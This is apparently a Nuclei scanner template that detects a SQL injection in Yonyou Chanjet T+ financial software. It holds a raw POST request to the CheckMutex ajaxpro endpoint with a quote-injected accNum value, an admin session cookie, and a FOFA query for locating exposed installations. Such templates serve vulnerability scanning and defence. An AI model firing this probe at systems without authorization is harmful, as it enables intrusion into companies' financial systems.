http:
    - matchers:
        - condition: or
          part: body
          type: word
          words:
            - 附近有语法错误
            - '"value"'
      raw:
        - |
          POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
          Host: {{Hostname}}
          Content-Type: text/plain
          Cookie: ASP.NET_SessionId=; sid=admin

          {"accNum": "6'", "functionTag": "SYS0104", "url": ""}
id: yonyou-chanjet-tplus-checkmutex-sqli
info:
    author: hufei
    description: |
        There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
    metadata:
        fofa-query: app="畅捷通-TPlus"
        max-request: 1
        verified: true
    name: yonyou-chanjettplus - SQL Injection
    reference:
        - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
    severity: high
    tags:
        - chanjet
        - yonyou
        - uIP
        - 畅捷通-TPlus
        - ajaxpro
        - asp.net
